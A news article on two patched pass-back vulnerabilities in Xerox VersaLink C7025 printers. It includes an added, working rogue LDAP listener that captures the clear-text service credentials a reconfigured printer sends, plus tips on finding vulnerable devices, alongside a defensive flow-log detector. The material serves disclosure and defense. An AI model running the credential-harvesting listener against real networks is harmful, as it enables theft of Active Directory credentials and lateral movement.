A popular small-to-midrange Xerox enterprise printer contains two now-patched vulnerabilities in its firmware that give attackers a path to full access to an organization's Windows environment.
The vulnerabilities affect firmware version 57.69.91 and earlier in Xerox VersaLink C7025 multifunction printers (MFPs). Both flaws enable what are known as pass-back attacks, a class of attacks in which a bad actor captures stored credentials by manipulating the MFP's configuration so that the device authenticates to a server the attacker controls.
Full Access to Windows Environments
In certain situations, a malicious actor who successfully exploits the Xerox printer vulnerabilities would be able to capture credentials for Windows Active Directory, according to researchers at Rapid7, who discovered the flaws. "This means they could then move laterally within an organization's environment and compromise other critical Windows servers and file systems," Deral Heiland, principal security researcher, IoT, at Rapid7, wrote in a recent blog post.
Xerox describes the VersaLink C7025 as a multifunction printer featuring ConnectKey, a Xerox technology that lets customers interact with the printers over the cloud and via mobile devices. Among other things, the technology includes security features that, according to Xerox, help prevent attacks, detect potentially malicious changes to the printer, and protect against unauthorized transmission of critical data. Xerox has positioned its VersaLink family of printers as ideal for small and medium-sized workgroups that print around 7,000 pages per month.
The two vulnerabilities that Rapid7 discovered in the printer, and which Xerox has since fixed, are CVE-2024-12510 (CVSS score: 6.7), an LDAP pass-back vulnerability, and CVE-2024-12511 (CVSS score: 7.6), an SMB/FTP pass-back vulnerability.
The vulnerabilities, according to Rapid7, allow an attacker to alter the MFP's configuration so that the printer sends the authentication credentials it has stored for those services to an attacker-controlled system. The attack works only if a vulnerable Xerox VersaLink C7025 printer is configured for LDAP and/or SMB services.
In such a scenario, CVE-2024-12510 would allow an attacker to access the MFP's LDAP configuration page and change the LDAP server IP address in the printer's settings to point to their own malicious LDAP server. When the printer next tries to authenticate users by checking the LDAP User Mappings page, it connects to the attacker's fake LDAP server instead of the legitimate corporate LDAP server. This paves the way for the attacker to capture the LDAP service credentials in clear text, Heiland wrote.
CVE-2024-12511 permits similar credential capture when the SMB or FTP scan function is enabled on a vulnerable Xerox VersaLink C7025 printer. An attacker with admin-level access can modify the SMB or FTP server's IP address to point at their own malicious host and capture the SMB or FTP authentication credentials the printer presents.
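To make the LDAP pass-back concrete, here is the receiving end: a minimal rogue LDAP listener that decodes the simple BindRequest an MFP sends when it is pointed at the attacker's address, and extracts the bind DN and password. This is an added example for this page, not code from the Rapid7 write-up or from Xerox; the BER/LDAP encoding follows RFC 4511, while the sample bind message, the DN, the password and the listening address are constructed for the demonstration.

```python
"""Rogue LDAP listener: harvest clear-text credentials from a simple bind.

An MFP configured for LDAP (without TLS) sends its stored service account's
DN and password inside an LDAPMessage/BindRequest. Point the printer's LDAP
server address at the host running serve() and the credentials arrive here.
Added example; all sample data below is constructed, not captured.
"""
import socketserver
from typing import Optional, Tuple


def ber_len(buf: bytes, pos: int) -> Tuple[int, int]:
    """Decode a BER length at buf[pos]; return (length, offset of the contents)."""
    first = buf[pos]
    if first < 0x80:                                   # short form: one byte
        return first, pos + 1
    n = first & 0x7F                                   # long form: next n bytes hold the length
    if n == 0 or n > 4:
        raise ValueError("unsupported BER length encoding")
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), pos + 1 + n


def ber_tlv(buf: bytes, pos: int, expected_tag: int) -> Tuple[bytes, int]:
    """Read one tag-length-value element; return (value bytes, offset after it)."""
    if pos >= len(buf) or buf[pos] != expected_tag:
        raise ValueError(f"expected tag 0x{expected_tag:02x} at offset {pos}")
    length, start = ber_len(buf, pos + 1)
    end = start + length
    if end > len(buf):
        raise ValueError("truncated element")
    return buf[start:end], end


def parse_simple_bind(msg: bytes) -> Optional[Tuple[int, str, str]]:
    """Return (version, bind DN, password) for a simple bind, else None.

    LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp [APPLICATION 0] BindRequest }
    BindRequest ::= SEQUENCE { version INTEGER, name OCTET STRING, simple [0] OCTET STRING }
    """
    body, _ = ber_tlv(msg, 0, 0x30)                    # SEQUENCE
    _msg_id, pos = ber_tlv(body, 0, 0x02)              # messageID
    if pos >= len(body) or body[pos] != 0x60:          # not a BindRequest (e.g. search)
        return None
    bind, _ = ber_tlv(body, pos, 0x60)
    ver, pos = ber_tlv(bind, 0, 0x02)                  # protocol version (3)
    name, pos = ber_tlv(bind, pos, 0x04)               # bind DN
    if pos >= len(bind) or bind[pos] != 0x80:          # [3] SASL bind carries no clear-text password
        return None
    password, _ = ber_tlv(bind, pos, 0x80)             # simple authentication
    return int.from_bytes(ver, "big"), name.decode("utf-8"), password.decode("utf-8", "replace")


def _ber(tag: int, content: bytes) -> bytes:
    """Encode one TLV (short or long form length); used only to build test input."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    ln = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(ln)]) + ln + content


def build_simple_bind(msg_id: int, dn: str, password: str) -> bytes:
    """Encode a BindRequest the way an LDAP client would (msg_id < 128 assumed)."""
    bind = _ber(0x02, b"\x03") + _ber(0x04, dn.encode()) + _ber(0x80, password.encode())
    return _ber(0x30, _ber(0x02, bytes([msg_id])) + _ber(0x60, bind))


# Constructed sample: messageID 1, version 3, DN "cn=admin,dc=corp", password "Secret1".
SAMPLE_BIND = bytes.fromhex(
    "3023"                                             # LDAPMessage, 35 bytes follow
    "020101"                                           # messageID 1
    "601e"                                             # BindRequest, 30 bytes follow
    "020103"                                           # version 3
    "0410" + "cn=admin,dc=corp".encode().hex() +       # name, 16 bytes
    "8007" + "Secret1".encode().hex()                  # simple auth, 7 bytes
)


class BindCapture(socketserver.BaseRequestHandler):
    """One connection per bind attempt: log what arrived, then drop the socket.
    The printer will log an LDAP failure, which is itself a defender's clue."""

    def handle(self) -> None:
        data = self.request.recv(65535)
        try:
            result = parse_simple_bind(data)
        except ValueError as exc:
            print(f"[{self.client_address[0]}] not a simple bind: {exc}")
            return
        if result:
            version, dn, pw = result
            print(f"[{self.client_address[0]}] LDAPv{version} bind dn={dn!r} password={pw!r}")


def serve(bind_addr: str = "0.0.0.0", port: int = 389) -> None:
    """Listen on the address the MFP's LDAP server setting now points to (assumed 389/tcp)."""
    with socketserver.TCPServer((bind_addr, port), BindCapture) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    print(parse_simple_bind(SAMPLE_BIND))
    # serve()  # uncomment on the attacker-controlled host during an authorized test
```

Two caveats for anyone reproducing this in an authorized engagement: the clear-text capture only works when the MFP binds over plain LDAP (389) or accepts whatever certificate the rogue host presents over LDAPS/STARTTLS, and the equivalent SMB pass-back yields an NTLM challenge-response rather than a clear-text password, so it is captured and cracked or relayed with different tooling.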
All it takes for an attacker to find a vulnerable printer is to connect to an affected Xerox MFP via a Web browser, validate that the default password is still in place, and confirm that the device is configured for LDAP and/or SMB services, Heiland tells Dark Reading. "Also, it is often possible to query an MFP via SNMP and identify if LDAP services are enabled and configured."
The risk for organizations is that if a malicious actor were to gain any level of access to a business network, they could use the pass-back attack to easily harvest Active Directory credentials without being detected, he says. That would then allow them to pivot to more critical Windows systems within a compromised environment. "Unfortunately," he adds, "it is also not uncommon to find LDAP settings on MFP devices that contain Domain Admin credentials," which potentially could give a bad actor full control of an organization's Windows environment.
"Since LDAP and SMB settings on MFP devices typically contain Windows Active Directory credentials, a successful attack would give a malicious actor access to Windows file services, domain information, email accounts, and database systems," Heiland says. "If a Domain Admin account or account with elevated privileges was used for LDAP or SMB, then an attacker would have unfettered access to potentially everything across the organization's Windows environment."
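The "without being detected" claim holds only if nobody is watching where the printers authenticate. A pass-back always produces one distinctive artifact on the network: a printer opening an LDAP, SMB or FTP session to a host that is not one of its sanctioned servers. The following detection, an added example that is not part of the article or of Rapid7's research, runs that check over flow records; the printer subnet, the allow-listed servers, the key=value log format and the log lines are all constructed for the example.

```python
"""Flag printers authenticating to unsanctioned LDAP/SMB/FTP destinations.

Added example. The environment and log format below are constructed: adapt
PRINTER_NETS and SANCTIONED_DESTS to the real printer VLANs, domain controllers
and scan-to-file servers, and parse_flow() to the firewall's export format.
"""
import ipaddress
from typing import Dict, Iterable, List, Optional, Set

# Constructed environment: where the MFPs live and which servers they may
# legitimately authenticate to, keyed by destination port.
PRINTER_NETS = [ipaddress.ip_network("10.20.30.0/24")]
SANCTIONED_DESTS: Dict[int, Set[str]] = {
    389: {"10.0.0.10", "10.0.0.11"},   # LDAP  -> domain controllers only
    636: {"10.0.0.10", "10.0.0.11"},   # LDAPS -> domain controllers only
    445: {"10.0.1.50"},                # SMB   -> the scan-to-file server only
    21: set(),                         # FTP   -> no sanctioned destination at all
}
SERVICE_NAMES = {389: "LDAP", 636: "LDAPS", 445: "SMB", 21: "FTP"}

# Constructed flow records: one printer bound normally, then the same printer
# (10.20.30.15) and a second one (10.20.30.16) talk to an unknown host.
SAMPLE_FLOWS = [
    "ts=2025-02-17T09:12:01Z src=10.20.30.15 dst=10.0.0.10 dport=389 proto=tcp action=allow",
    "ts=2025-02-17T09:12:44Z src=10.20.30.15 dst=192.168.77.9 dport=389 proto=tcp action=allow",
    "ts=2025-02-17T09:13:02Z src=10.20.30.15 dst=10.0.1.50 dport=445 proto=tcp action=allow",
    "ts=2025-02-17T09:13:30Z src=10.20.30.15 dst=192.168.77.9 dport=445 proto=tcp action=allow",
    "ts=2025-02-17T09:14:00Z src=10.5.5.5 dst=192.168.77.9 dport=389 proto=tcp action=allow",
    "ts=2025-02-17T09:14:10Z src=10.20.30.16 dst=10.0.0.10 dport=80 proto=tcp action=allow",
    "ts=2025-02-17T09:14:20Z src=10.20.30.16 dst=192.168.77.9 dport=21 proto=tcp action=deny",
]


def parse_flow(line: str) -> Dict[str, str]:
    """Split a key=value flow record into a dict; tokens without '=' are ignored."""
    fields: Dict[str, str] = {}
    for token in line.split():
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    return fields


def is_printer(ip: str) -> bool:
    """True if the address falls in one of the printer subnets."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRINTER_NETS)


def classify(flow: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return an alert when a printer uses an auth protocol toward a non-sanctioned host."""
    try:
        dport = int(flow["dport"])
        src, dst = flow["src"], flow["dst"]
        src_is_printer = is_printer(src)          # ValueError on a malformed address
    except (KeyError, ValueError):
        return None
    if dport not in SERVICE_NAMES or not src_is_printer:
        return None
    if dst in SANCTIONED_DESTS[dport]:
        return None
    service = SERVICE_NAMES[dport]
    return {
        "ts": flow.get("ts", "?"),
        "src": src,
        "dst": dst,
        "service": service,
        # A denied flow is still an alert: the printer was already reconfigured.
        "reason": f"printer {src} attempted {service} to unsanctioned host {dst} ({flow.get('action', '?')})",
    }


def find_passback(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Run the check over a stream of flow records and collect the alerts."""
    return [alert for alert in (classify(parse_flow(line)) for line in lines) if alert]


def rogue_hosts(alerts: Iterable[Dict[str, str]]) -> Dict[str, Set[str]]:
    """Group alerts by destination: one host collecting several protocols
    from the printer VLAN is the signature of an attacker-controlled listener."""
    by_dst: Dict[str, Set[str]] = {}
    for alert in alerts:
        by_dst.setdefault(alert["dst"], set()).add(alert["service"])
    return by_dst


if __name__ == "__main__":
    found = find_passback(SAMPLE_FLOWS)
    for alert in found:
        print(alert["ts"], alert["reason"])
    print("rogue hosts:", rogue_hosts(found))
```

The same allow-list logic applies whether the bind crosses the wire in clear text (LDAP, FTP) or as an NTLM challenge-response (SMB): the destination, not the credential format, is what gives the pass-back away. Pair it with an alert on successful logins to the MFP's administrative web interface from addresses outside the admin network, since every variant of this attack starts with a configuration change there.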
An Ideal Scenario for Threat Actors
Jim Routh, chief trust officer at Saviynt, says an attacker would need relatively sophisticated technical skills to exploit these kinds of vulnerabilities. But for those who can, the LDAP vulnerability enables access to Windows Active Directory, where all administrator profiles and credentials reside. "It's the ideal scenario for the threat actor," he notes. "Every device connected to the Internet has configuration options that offer … an attack surface for the cybercriminal."
Xerox has released a patched version of the affected Xerox VersaLink MFP firmware, allowing customer organizations to update and fix the issues. Organizations that cannot immediately patch should set a "complex password for the admin account and also avoid using Windows authentication accounts that have elevated privileges, such as a Domain Admin account for LDAP or scan-to-file SMB services," according to the Rapid7 blog post. "Also, organizations should avoid enabling the remote-control console for unauthenticated users."
Printer vulnerabilities are a growing problem for many organizations because of the rise in remote and hybrid work models. A 2024 study by Quocirca found 67% of organizations had experienced a security incident tied to a printer vulnerability, up from 61% the prior year. Despite the trend, many organizations continue to underestimate printer-related threats, making printers a soft spot for attackers to target.